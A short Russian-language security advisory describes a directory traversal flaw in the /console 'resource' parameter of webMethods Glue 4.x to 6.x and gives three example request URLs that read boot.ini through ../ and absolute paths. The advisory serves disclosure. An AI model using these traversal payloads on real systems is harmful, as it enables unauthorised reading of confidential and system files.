Программа: 
webMethods Glue 4.x
webMethods Glue 5.x
webMethods Glue 6.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в параметре "resource" через /console URL перед отображением файлов. Атакующий может просмотреть произвольные файлы целевой системе.

Примеры:

http://glueconsole:8080/console?resource=../../../boot.ini
http://glueconsole:8080/console?resource=\boot.ini
http://glueconsole:8080/console?resource=c:\boot.ini

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии